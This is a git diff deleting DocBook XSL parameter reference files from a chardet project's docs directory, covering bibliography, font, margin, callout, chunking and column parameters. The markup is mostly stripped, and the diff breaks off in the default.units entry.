b/chardet/docs/docbook/xsl/params/biblioentry.item.separator.xml deleted file mode 100644 index 0146e69..0000000 --- a/chardet/docs/docbook/xsl/params/biblioentry.item.separator.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -biblioentry.item.separator -string - - -biblioentry.item.separator -Text to separate bibliography entries - - - -. - - -Description - -Text to separate bibliography entries - - - - diff --git a/chardet/docs/docbook/xsl/params/bibliography.collection.xml b/chardet/docs/docbook/xsl/params/bibliography.collection.xml deleted file mode 100644 index 2e69e7d..0000000 --- a/chardet/docs/docbook/xsl/params/bibliography.collection.xml +++ /dev/null @@ -1,96 +0,0 @@ - - -bibliography.collection -string - - -bibliography.collection -Name of the bibliography collection file - - - - - - -Description - -Maintaining bibliography entries across a set of documents is tedious, time -consuming, and error prone. It makes much more sense, usually, to store all of -the bibliography entries in a single place and simply extract -the ones you need in each document. - -That's the purpose of the -bibliography.collection parameter. To setup a global -bibliography database, follow these steps: - -First, create a stand-alone bibliography document that contains all of -the documents that you wish to reference. Make sure that each bibliography -entry (whether you use biblioentry or bibliomixed) -has an ID. - -My global bibliography, ~/bibliography.xml begins -like this: - - - -References - -XML 1.0Tim Bray, -Jean Paoli, C. M. Sperberg-McQueen, and Eve Maler, editors. -Extensible Markup -Language (XML) 1.0 Second Edition. -World Wide Web Consortium, 2000. - - -NamespacesTim Bray, -Dave Hollander, -and Andrew Layman, editors. -Namespaces in -XML. -World Wide Web Consortium, 1999. - - - - -]]> - - -When you create a bibliography in your document, simply -provide empty bibliomixed -entries for each document that you wish to cite. Make sure that these -elements have the same ID as the corresponding real -entry in your global bibliography. - -For example: - - -Bibliography - - - -Donald E. Knuth. Computers and -Typesetting: Volume B, TeX: The Program. Addison-Wesley, -1986. ISBN 0-201-13437-3. - - - -]]> - - -Note that it's perfectly acceptable to mix entries from your -global bibliography with normal entries. You can use -xref or other elements to cross-reference your -bibliography entries in exactly the same way you do now. - -Finally, when you are ready to format your document, simply set the -bibliography.collection parameter (in either a -customization layer or directly through your processor's interface) to -point to your global bibliography. - -The stylesheets will format the bibliography in your document as if -all of the entries referenced appeared there literally. - - - diff --git a/chardet/docs/docbook/xsl/params/bibliography.numbered.xml b/chardet/docs/docbook/xsl/params/bibliography.numbered.xml deleted file mode 100644 index 13cc104..0000000 --- a/chardet/docs/docbook/xsl/params/bibliography.numbered.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -bibliography.numbered -boolean - - -bibliography.numbered -Should bibliography entries be numbered? - - - - - - - - -Description - -If non-zero bibliography entries will be numbered - - - diff --git a/chardet/docs/docbook/xsl/params/blockquote.properties.xml b/chardet/docs/docbook/xsl/params/blockquote.properties.xml deleted file mode 100644 index 1803adb..0000000 --- a/chardet/docs/docbook/xsl/params/blockquote.properties.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -blockquote.properties -To set the style for block quotations. - - - - - -0.5in -0.5in -0.5em -1em -2em - - - - -Description - -The blockquote.properties attribute set specifies -the formating properties of block quotations. - - - diff --git a/chardet/docs/docbook/xsl/params/body.font.family.xml b/chardet/docs/docbook/xsl/params/body.font.family.xml deleted file mode 100644 index b5e75fe..0000000 --- a/chardet/docs/docbook/xsl/params/body.font.family.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -body.font.family - - - -body.font.family -The default font family for body text - - - - - - - - -Description - -The body font family is the default font used for text in the page body. - - - - diff --git a/chardet/docs/docbook/xsl/params/body.font.master.xml b/chardet/docs/docbook/xsl/params/body.font.master.xml deleted file mode 100644 index 4c532b8..0000000 --- a/chardet/docs/docbook/xsl/params/body.font.master.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -body.font.master - - - -body.font.master -Specifies the default point size for body text - - - - -10 - - - -Description - -The body font size is specified in two parameters -(body.font.master and body.font.size) -so that math can be performed on the font size by XSLT. - - - - diff --git a/chardet/docs/docbook/xsl/params/body.font.size.xml b/chardet/docs/docbook/xsl/params/body.font.size.xml deleted file mode 100644 index 56134c8..0000000 --- a/chardet/docs/docbook/xsl/params/body.font.size.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -body.font.size - - - -body.font.size -Specifies the default font size for body text - - - - - pt - - - -Description - -The body font size is specified in two parameters -(body.font.master and body.font.size) -so that math can be performed on the font size by XSLT. - - - - diff --git a/chardet/docs/docbook/xsl/params/body.margin.bottom.xml b/chardet/docs/docbook/xsl/params/body.margin.bottom.xml deleted file mode 100644 index 98d1233..0000000 --- a/chardet/docs/docbook/xsl/params/body.margin.bottom.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -body.margin.bottom - - - -body.margin.bottom -The bottom margin of the body text - - - - - - - - -Description - -The body bottom margin is the distance from the last line of text -in the page body to the bottom of the region-after. - - - - diff --git a/chardet/docs/docbook/xsl/params/body.margin.top.xml b/chardet/docs/docbook/xsl/params/body.margin.top.xml deleted file mode 100644 index 96ea690..0000000 --- a/chardet/docs/docbook/xsl/params/body.margin.top.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -body.margin.top - - - -body.margin.top -To specify the size of the top margin of a page - - - - - - - - -Description - -The body top margin is the distance from the top of the region-before -to the first line of text in the page body. - - - - diff --git a/chardet/docs/docbook/xsl/params/bridgehead.in.toc.xml b/chardet/docs/docbook/xsl/params/bridgehead.in.toc.xml deleted file mode 100644 index 4fbc4f6..0000000 --- a/chardet/docs/docbook/xsl/params/bridgehead.in.toc.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -bridgehead.in.toc -boolean - - -bridgehead.in.toc -Should bridgehead elements appear in the TOC? - - - - - - -Description - -If non-zero, bridgeheads appear in the TOC. Note that this option -is not fully supported and may be removed in a future version of the -stylesheets. - - - - diff --git a/chardet/docs/docbook/xsl/params/callout.defaultcolumn.xml b/chardet/docs/docbook/xsl/params/callout.defaultcolumn.xml deleted file mode 100644 index 059a5e5..0000000 --- a/chardet/docs/docbook/xsl/params/callout.defaultcolumn.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -callout.defaultcolumn -integer - - -callout.defaultcolumn -Indicates what column callouts appear in by default - - - - - - -Description - -If a callout does not identify a column (for example, if it uses -the linerange unit), -it will appear in the default column. - - - - diff --git a/chardet/docs/docbook/xsl/params/callout.graphics.extension.xml b/chardet/docs/docbook/xsl/params/callout.graphics.extension.xml deleted file mode 100644 index 4503569..0000000 --- a/chardet/docs/docbook/xsl/params/callout.graphics.extension.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -callout.graphics.extension -string - - -callout.graphics.extension -Extension for callout graphics - - - - - - -Description - -Sets the extension to use on callout graphics. - - - diff --git a/chardet/docs/docbook/xsl/params/callout.graphics.number.limit.xml b/chardet/docs/docbook/xsl/params/callout.graphics.number.limit.xml deleted file mode 100644 index 16559ca..0000000 --- a/chardet/docs/docbook/xsl/params/callout.graphics.number.limit.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -callout.graphics.number.limit -integer - - -callout.graphics.number.limit -Number of the largest callout graphic - - - - - - -Description - -If callout.graphics -is non-zero, graphics are used to represent -callout numbers. The value of -callout.graphics.number.limit -is -the largest number for which a graphic exists. If the callout number -exceeds this limit, the default presentation "(nnn)" will always -be used. - - - - diff --git a/chardet/docs/docbook/xsl/params/callout.graphics.path.xml b/chardet/docs/docbook/xsl/params/callout.graphics.path.xml deleted file mode 100644 index 33f5a15..0000000 --- a/chardet/docs/docbook/xsl/params/callout.graphics.path.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -callout.graphics.path -string - - -callout.graphics.path -Path to callout graphics - - - - - - - - -Description - -Sets the path, probably relative to the directory where the HTML -files are created, to the callout graphics. - - - - diff --git a/chardet/docs/docbook/xsl/params/callout.graphics.xml b/chardet/docs/docbook/xsl/params/callout.graphics.xml deleted file mode 100644 index ed54e97..0000000 --- a/chardet/docs/docbook/xsl/params/callout.graphics.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -callout.graphics -boolean - - -callout.graphics -Use graphics for callouts? - - - - - - - - -Description - -If non-zero, callouts are presented with graphics (e.g., reverse-video -circled numbers instead of "(1)", "(2)", etc.). -Default graphics are provided in the distribution. - - - - diff --git a/chardet/docs/docbook/xsl/params/callout.list.table.xml b/chardet/docs/docbook/xsl/params/callout.list.table.xml deleted file mode 100644 index bbfcb7a..0000000 --- a/chardet/docs/docbook/xsl/params/callout.list.table.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -callout.list.table -boolean - - -callout.list.table -Present callout lists using a table? - - - - - - -Description - -The default presentation of CalloutLists uses -an HTML DL. Some browsers don't align DLs very well -if callout.graphics are used. With this option -turned on, CalloutLists are presented in an HTML -TABLE, which usually results in better alignment -of the callout number with the callout description. - - - diff --git a/chardet/docs/docbook/xsl/params/callout.unicode.font.xml b/chardet/docs/docbook/xsl/params/callout.unicode.font.xml deleted file mode 100644 index efcbdd0..0000000 --- a/chardet/docs/docbook/xsl/params/callout.unicode.font.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -callout.unicode.font - - - -callout.unicode.font -Specify a font for Unicode glyphs - - - - - - -Description - -The name of the font to specify around Unicode callout glyphs. -If set to the empty string, no font change will occur. - - - - diff --git a/chardet/docs/docbook/xsl/params/callout.unicode.number.limit.xml b/chardet/docs/docbook/xsl/params/callout.unicode.number.limit.xml deleted file mode 100644 index f02ae3d..0000000 --- a/chardet/docs/docbook/xsl/params/callout.unicode.number.limit.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -callout.unicode.number.limit -integer - - -callout.unicode.number.limit -Number of the largest callout graphic - - - - - - -Description - -If callout.unicode -is non-zero, unicode characters are used to represent -callout numbers. The value of -callout.unicode.number.limit -is -the largest number for which a unicode character exists. If the callout number -exceeds this limit, the default presentation "(nnn)" will always -be used. - - - - diff --git a/chardet/docs/docbook/xsl/params/callout.unicode.start.character.xml b/chardet/docs/docbook/xsl/params/callout.unicode.start.character.xml deleted file mode 100644 index 6423eb5..0000000 --- a/chardet/docs/docbook/xsl/params/callout.unicode.start.character.xml +++ /dev/null @@ -1,26 +0,0 @@ - - -callout.unicode.start.character -integer - - -callout.unicode.start.character -First Unicode character to use, decimal value. - - - - - - -Description - -If callout.graphics is zero and callout.unicode -is non-zero, unicode characters are used to represent -callout numbers. The value of -callout.unicode.start.character -is the decimal unicode value used for callout number one. Currently, -only 10102 is supported in the stylesheets for this parameter. - - - - diff --git a/chardet/docs/docbook/xsl/params/callout.unicode.xml b/chardet/docs/docbook/xsl/params/callout.unicode.xml deleted file mode 100644 index f0a00b0..0000000 --- a/chardet/docs/docbook/xsl/params/callout.unicode.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -callout.unicode -boolean - - -callout.unicode -Use Unicode characters rather than images for callouts. - - - - - - -Description - -The stylesheets can use either an image of the numbers one to ten, or the single Unicode character which represents the numeral, in white on a black background. Use this to select the Unicode character option. - - - - diff --git a/chardet/docs/docbook/xsl/params/callouts.extension.xml b/chardet/docs/docbook/xsl/params/callouts.extension.xml deleted file mode 100644 index 8480870..0000000 --- a/chardet/docs/docbook/xsl/params/callouts.extension.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -callouts.extension -boolean - - -callouts.extension -Enable the callout extension - - - - - - -Description - -The callouts extension processes areaset -elements in ProgramListingCO and other text-based -callout elements. - - - - diff --git a/chardet/docs/docbook/xsl/params/chapter.autolabel.xml b/chardet/docs/docbook/xsl/params/chapter.autolabel.xml deleted file mode 100644 index 309e618..0000000 --- a/chardet/docs/docbook/xsl/params/chapter.autolabel.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -chapter.autolabel -boolean - - -chapter.autolabel -Are chapters automatically enumerated? - - - - - - -Description - -If true (non-zero), unlabeled chapters will be enumerated. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunk.first.sections.xml b/chardet/docs/docbook/xsl/params/chunk.first.sections.xml deleted file mode 100644 index f1f9a0a..0000000 --- a/chardet/docs/docbook/xsl/params/chunk.first.sections.xml +++ /dev/null @@ -1,26 +0,0 @@ - - -chunk.first.sections - - - -chunk.first.sections -Chunk the first top-level section? - - - - - - - - -Description - -If non-zero, a chunk will be created for the first top-level -sect1 or section elements in -each component. Otherwise, that section will be part of the chunk for -its parent. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunk.quietly.xml b/chardet/docs/docbook/xsl/params/chunk.quietly.xml deleted file mode 100644 index 78200a5..0000000 --- a/chardet/docs/docbook/xsl/params/chunk.quietly.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -chunk.quietly - - - -chunk.quietly -Omit the chunked filename messages. - - - - - - - - -Description - -If zero (the default), the XSL processor emits a message naming -each separate chunk filename as it is being output. -If nonzero, then the messages are suppressed. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunk.section.depth.xml b/chardet/docs/docbook/xsl/params/chunk.section.depth.xml deleted file mode 100644 index af29641..0000000 --- a/chardet/docs/docbook/xsl/params/chunk.section.depth.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -chunk.section.depth -integer - - -chunk.section.depth -Depth to which sections should be chunked - - - - - - - - -Description - -This parameter sets the depth of section chunking. - - - diff --git a/chardet/docs/docbook/xsl/params/chunk.sections.xml b/chardet/docs/docbook/xsl/params/chunk.sections.xml deleted file mode 100644 index 38bf39e..0000000 --- a/chardet/docs/docbook/xsl/params/chunk.sections.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -chunk.sections - - - -chunk.sections -Should top-level sections be chunks in their own right? - - - - - - -Description - -If non-zero, chunks will be created for top-level -sect1 and section elements in -each component. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunk.toc.xml b/chardet/docs/docbook/xsl/params/chunk.toc.xml deleted file mode 100644 index 279b1c2..0000000 --- a/chardet/docs/docbook/xsl/params/chunk.toc.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -chunk.toc -string - - -chunk.toc -An explicit TOC to be used for chunking - - - - - - - - -Description - -The chunk.toc identifies an explicit TOC that -will be used for chunking. This parameter is only used by the -chunktoc.xsl stylesheet (and customization layers built -from it). - - - diff --git a/chardet/docs/docbook/xsl/params/chunk.tocs.and.lots.xml b/chardet/docs/docbook/xsl/params/chunk.tocs.and.lots.xml deleted file mode 100644 index 655b3ff..0000000 --- a/chardet/docs/docbook/xsl/params/chunk.tocs.and.lots.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -chunk.tocs.and.lots -boolean - - -chunk.tocs.and.lots -Should ToC and LoTs be in separate chunks? - - - - - - - - -Description - -If non-zero, ToC and LoT (List of Examples, List of Figures, etc.) -will be put in a separate chunk. At the moment, this chunk is not in the -normal forward/backward navigation list. Instead, a new link is added to the -navigation footer. - -This feature is still somewhat experimental. Feedback welcome. - - - diff --git a/chardet/docs/docbook/xsl/params/chunker.output.cdata-section-elements.xml b/chardet/docs/docbook/xsl/params/chunker.output.cdata-section-elements.xml deleted file mode 100644 index 0f77056..0000000 --- a/chardet/docs/docbook/xsl/params/chunker.output.cdata-section-elements.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -chunker.output.cdata-section-elements -string - - -chunker.output.cdata-section-elements -List of elements to escape with CDATA sections - - -<xsl:param name="chunker.output.cdata-section-elements" select="''"/> - - -Description - -This parameter specifies the list of elements that should be escaped -as CDATA sections by the chunking stylesheet. Not all processors support -specification of this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunker.output.doctype-public.xml b/chardet/docs/docbook/xsl/params/chunker.output.doctype-public.xml deleted file mode 100644 index 06e3423..0000000 --- a/chardet/docs/docbook/xsl/params/chunker.output.doctype-public.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -chunker.output.doctype-public -string - - -chunker.output.doctype-public -Public identifer to use in the document type of generated pages - - -<xsl:param name="chunker.output.doctype-public" select="''"/> - - -Description - -This parameter specifies the public identifier that should be used by -the chunking stylesheet in the document type declaration of chunked pages. -Not all processors support specification of -this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunker.output.doctype-system.xml b/chardet/docs/docbook/xsl/params/chunker.output.doctype-system.xml deleted file mode 100644 index 6147e0d..0000000 --- a/chardet/docs/docbook/xsl/params/chunker.output.doctype-system.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -chunker.output.doctype-system -uri - - -chunker.output.doctype-system -System identifier to use for the document type in generated pages - - -<xsl:param name="chunker.output.doctype-system" select="''"/> - - -Description - -This parameter specifies the system identifier that should be used by -the chunking stylesheet in the document type declaration of chunked pages. -Not all processors support specification of -this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunker.output.encoding.xml b/chardet/docs/docbook/xsl/params/chunker.output.encoding.xml deleted file mode 100644 index c10b137..0000000 --- a/chardet/docs/docbook/xsl/params/chunker.output.encoding.xml +++ /dev/null @@ -1,29 +0,0 @@ - - -chunker.output.encoding -string - - -chunker.output.encoding -Encoding used in generated pages - - -<xsl:param name="chunker.output.encoding" select="'ISO-8859-1'"/> - - -Description - -This parameter specifies the encoding to be used in files -generated by the chunking stylesheet. Not all processors support -specification of this parameter. - - -This parameter used to be named default.encoding. - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunker.output.indent.xml b/chardet/docs/docbook/xsl/params/chunker.output.indent.xml deleted file mode 100644 index 3dadc05..0000000 --- a/chardet/docs/docbook/xsl/params/chunker.output.indent.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -chunker.output.indent -string - - -chunker.output.indent -Specification of indentation on generated pages - - -<xsl:param name="chunker.output.indent" select="'no'"/> - - -Description - -This parameter specifies the value of the indent -specification for generated pages. Not all processors support -specification of this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunker.output.media-type.xml b/chardet/docs/docbook/xsl/params/chunker.output.media-type.xml deleted file mode 100644 index 5b07e0e..0000000 --- a/chardet/docs/docbook/xsl/params/chunker.output.media-type.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -chunker.output.media-type -string - - -chunker.output.media-type -Media type to use in generated pages - - -<xsl:param name="chunker.output.media-type" select="''"/> - - -Description - -This parameter specifies the media type that should be used by -the chunking stylesheet. Not all processors support specification of -this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunker.output.method.xml b/chardet/docs/docbook/xsl/params/chunker.output.method.xml deleted file mode 100644 index df16f06..0000000 --- a/chardet/docs/docbook/xsl/params/chunker.output.method.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -chunker.output.method -list -html -xml - - -chunker.output.method -Method used in generated pages - - -<xsl:param name="chunker.output.method" select="'html'"/> - - -Description - -This parameter specifies the output method to be used in files -generated by the chunking stylesheet. - - -This parameter used to be named output.method. - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunker.output.omit-xml-declaration.xml b/chardet/docs/docbook/xsl/params/chunker.output.omit-xml-declaration.xml deleted file mode 100644 index 84ed80a..0000000 --- a/chardet/docs/docbook/xsl/params/chunker.output.omit-xml-declaration.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -chunker.output.omit-xml-declaration - - - -chunker.output.omit-xml-declaration -Omit-xml-declaration for generated pages - - -<xsl:param name="chunker.output.omit-xml-declaration" select="'no'"/> - - -Description - -This parameter specifies the value of the omit-xml-declaration -specification for generated pages. Not all processors support -specification of this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/chunker.output.standalone.xml b/chardet/docs/docbook/xsl/params/chunker.output.standalone.xml deleted file mode 100644 index bfd145c..0000000 --- a/chardet/docs/docbook/xsl/params/chunker.output.standalone.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -chunker.output.standalone -string - - -chunker.output.standalone -Standalone declaration for generated pages - - -<xsl:param name="chunker.output.standalone" select="'no'"/> - - -Description - -This parameter specifies the value of the standalone -specification for generated pages. Not all processors support -specification of this parameter. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/citerefentry.link.xml b/chardet/docs/docbook/xsl/params/citerefentry.link.xml deleted file mode 100644 index bd413c4..0000000 --- a/chardet/docs/docbook/xsl/params/citerefentry.link.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -citerefentry.link -boolean - - -citerefentry.link -Generate URL links when cross-referencing RefEntrys? - - - - - - -Description - -If true, a web link will be generated, presumably -to an online man->HTML gateway. The text of the link is -generated by the generate.citerefentry.link template. - - - - diff --git a/chardet/docs/docbook/xsl/params/collect.xref.targets.xml b/chardet/docs/docbook/xsl/params/collect.xref.targets.xml deleted file mode 100644 index 846a01f..0000000 --- a/chardet/docs/docbook/xsl/params/collect.xref.targets.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -collect.xref.targets -string - - -collect.xref.targets -Controls whether cross reference data is -collected - - - - - - -Description - -In order to resolve olinks efficiently, the stylesheets can -generate an external data file containing information about -all potential cross reference endpoints in a document. -This parameter determines whether the collection process is run when the document is processed by the stylesheet. The default value is no, which means the data file is not generated during processing. The other choices are yes, which means the data file is created and the document is processed for output, and only, which means the data file is created but the document is not processed for output. -See also targets.filename. - - - diff --git a/chardet/docs/docbook/xsl/params/column.count.back.xml b/chardet/docs/docbook/xsl/params/column.count.back.xml deleted file mode 100644 index ee30af9..0000000 --- a/chardet/docs/docbook/xsl/params/column.count.back.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -column.count.back -integer - - -column.count.back -Number of columns on back matter pages - - - - - - - - -Description - -Number of columns on back matter (appendix, glossary, etc.) pages. - - - diff --git a/chardet/docs/docbook/xsl/params/column.count.body.xml b/chardet/docs/docbook/xsl/params/column.count.body.xml deleted file mode 100644 index d76b0d7..0000000 --- a/chardet/docs/docbook/xsl/params/column.count.body.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -column.count.body -integer - - -column.count.body -Number of columns on body pages - - - - - - - - -Description - -Number of columns on body pages. - - - diff --git a/chardet/docs/docbook/xsl/params/column.count.front.xml b/chardet/docs/docbook/xsl/params/column.count.front.xml deleted file mode 100644 index 1fd023a..0000000 --- a/chardet/docs/docbook/xsl/params/column.count.front.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -column.count.front -integer - - -column.count.front -Number of columns on front matter pages - - - - - - - - -Description - -Number of columns on front matter (dedication, preface, etc.) pages. - - - diff --git a/chardet/docs/docbook/xsl/params/column.count.index.xml b/chardet/docs/docbook/xsl/params/column.count.index.xml deleted file mode 100644 index 26d0c1e..0000000 --- a/chardet/docs/docbook/xsl/params/column.count.index.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -column.count.index -integer - - -column.count.index -Number of columns on index pages - - - - - - - - -Description - -Number of columns on index pages. - - - diff --git a/chardet/docs/docbook/xsl/params/column.count.lot.xml b/chardet/docs/docbook/xsl/params/column.count.lot.xml deleted file mode 100644 index 6114827..0000000 --- a/chardet/docs/docbook/xsl/params/column.count.lot.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -column.count.lot -integer - - -column.count.lot -Number of columns on a 'List-of-Titles' page - - - - - - - - -Description - -Number of columns on a page sequence containing the Table of Contents, -List of Figures, etc. - - - diff --git a/chardet/docs/docbook/xsl/params/column.count.titlepage.xml b/chardet/docs/docbook/xsl/params/column.count.titlepage.xml deleted file mode 100644 index 2718058..0000000 --- a/chardet/docs/docbook/xsl/params/column.count.titlepage.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -column.count.titlepage -integer - - -column.count.titlepage -Number of columns on a title page - - - - - - - - -Description - -Number of columns on a title page - - - diff --git a/chardet/docs/docbook/xsl/params/column.gap.back.xml b/chardet/docs/docbook/xsl/params/column.gap.back.xml deleted file mode 100644 index 0515481..0000000 --- a/chardet/docs/docbook/xsl/params/column.gap.back.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -column.gap.back -length - - -column.gap.back -Gap between columns in back matter - - - - - - - - -Description - -Specifies the gap between columns in back matter (if -column.count.back is greater than one). - - - diff --git a/chardet/docs/docbook/xsl/params/column.gap.body.xml b/chardet/docs/docbook/xsl/params/column.gap.body.xml deleted file mode 100644 index 4a7bd10..0000000 --- a/chardet/docs/docbook/xsl/params/column.gap.body.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -column.gap.body -length - - -column.gap.body -Gap between columns in the body - - - - - - - - -Description - -Specifies the gap between columns in body matter (if -column.count.body is greater than one). - - - diff --git a/chardet/docs/docbook/xsl/params/column.gap.front.xml b/chardet/docs/docbook/xsl/params/column.gap.front.xml deleted file mode 100644 index 9a7f19d..0000000 --- a/chardet/docs/docbook/xsl/params/column.gap.front.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -column.gap.front -length - - -column.gap.front -Gap between columns in the front matter - - - - - - - - -Description - -Specifies the gap between columns in front matter (if -column.count.front is greater than one). - - - diff --git a/chardet/docs/docbook/xsl/params/column.gap.index.xml b/chardet/docs/docbook/xsl/params/column.gap.index.xml deleted file mode 100644 index f21221e..0000000 --- a/chardet/docs/docbook/xsl/params/column.gap.index.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -column.gap.index -length - - -column.gap.index -Gap between columns in the index - - - - - - - - -Description - -Specifies the gap between columns in indexes (if -column.count.index is greater than one). - - - diff --git a/chardet/docs/docbook/xsl/params/column.gap.lot.xml b/chardet/docs/docbook/xsl/params/column.gap.lot.xml deleted file mode 100644 index a620e75..0000000 --- a/chardet/docs/docbook/xsl/params/column.gap.lot.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -column.gap.lot -length - - -column.gap.lot -Gap between columns on a 'List-of-Titles' page - - - - - - - - -Description - -Specifies the gap between columns on 'List-of-Titles' pages (if -column.count.lot is greater than one). - - - diff --git a/chardet/docs/docbook/xsl/params/column.gap.titlepage.xml b/chardet/docs/docbook/xsl/params/column.gap.titlepage.xml deleted file mode 100644 index f379020..0000000 --- a/chardet/docs/docbook/xsl/params/column.gap.titlepage.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -column.gap.titlepage -length - - -column.gap.titlepage -Gap between columns on title pages - - - - - - - - -Description - -Specifies the gap between columns on title pages (if -column.count.titlepage is greater than one). - - - - diff --git a/chardet/docs/docbook/xsl/params/compact.list.item.spacing.xml b/chardet/docs/docbook/xsl/params/compact.list.item.spacing.xml deleted file mode 100644 index 43a1b69..0000000 --- a/chardet/docs/docbook/xsl/params/compact.list.item.spacing.xml +++ /dev/null @@ -1,19 +0,0 @@ - - -compact.list.item.spacing -What space do you want between list items (when spacing=compact)? - - - - - 0em - 0em - 0.2em - - -Description -Specify what spacing you want between each list item when -spacing is -compact. - - diff --git a/chardet/docs/docbook/xsl/params/css.decoration.xml b/chardet/docs/docbook/xsl/params/css.decoration.xml deleted file mode 100644 index 645e7a4..0000000 --- a/chardet/docs/docbook/xsl/params/css.decoration.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -css.decoration -boolean - - -css.decoration -Enable CSS decoration of elements - - - - - - - - -Description - - -If css.decoration is turned on, then HTML elements -produced by the -stylesheet may be decorated with STYLE attributes. For example, the -LI tags produced for list items may include a fragment of CSS in the -STYLE attribute which sets the CSS property "list-style-type". - - - - diff --git a/chardet/docs/docbook/xsl/params/current.docid.xml b/chardet/docs/docbook/xsl/params/current.docid.xml deleted file mode 100644 index 86593e1..0000000 --- a/chardet/docs/docbook/xsl/params/current.docid.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -current.docid -string - - -current.docid -targetdoc identifier for the document being -processed - - - - - -Description -When olinks between documents are resolved for HTML output, the stylesheet can compute the relative path between the current document and the target document. The stylesheet needs to know the targetdoc identifiers for both documents, as they appear in the target.database.document database file. This parameter passes to the stylesheet -the targetdoc identifier of the current document, since that -identifier does not appear in the document itself. -This parameter can also be used for print output. If an olink's targetdoc id differs from the current.docid, then the stylesheet can append the target document's title to the generated olink text. That identifies to the reader that the link is to a different document, not the current document. See also olink.doctitle to enable that feature. - - diff --git a/chardet/docs/docbook/xsl/params/default.float.class.xml b/chardet/docs/docbook/xsl/params/default.float.class.xml deleted file mode 100644 index fc66a29..0000000 --- a/chardet/docs/docbook/xsl/params/default.float.class.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -default.float.class -string - - -default.float.class -Specifies the default float class - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/default.image.width.xml b/chardet/docs/docbook/xsl/params/default.image.width.xml deleted file mode 100644 index edda404..0000000 --- a/chardet/docs/docbook/xsl/params/default.image.width.xml +++ /dev/null @@ -1,26 +0,0 @@ - - -default.image.width -length - - -default.image.width -The default width of images - - - - - - - - -Description - -If specified, this value will be used for the -width attribute on -images that do not specify any -viewport -dimensions. - - - diff --git a/chardet/docs/docbook/xsl/params/default.table.width.xml b/chardet/docs/docbook/xsl/params/default.table.width.xml deleted file mode 100644 index f908e3e..0000000 --- a/chardet/docs/docbook/xsl/params/default.table.width.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -default.table.width -length - - -default.table.width -The default width of tables - - - - - - -Description - -If specified, this value will be used for the WIDTH attribute on -tables that do not specify an alternate width (with the dbhtml processing -instruction). - - - diff --git a/chardet/docs/docbook/xsl/params/default.units.xml b/chardet/docs/docbook/xsl/params/default.units.xml deleted file mode 100644 index 16e74a1..0000000 --- a/chardet/docs/docbook/xsl/params/default.units.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -default.units -list -cm -mm -in -pt -pc -px -em - - -default.units -Default units for an unqualified dimension - - - 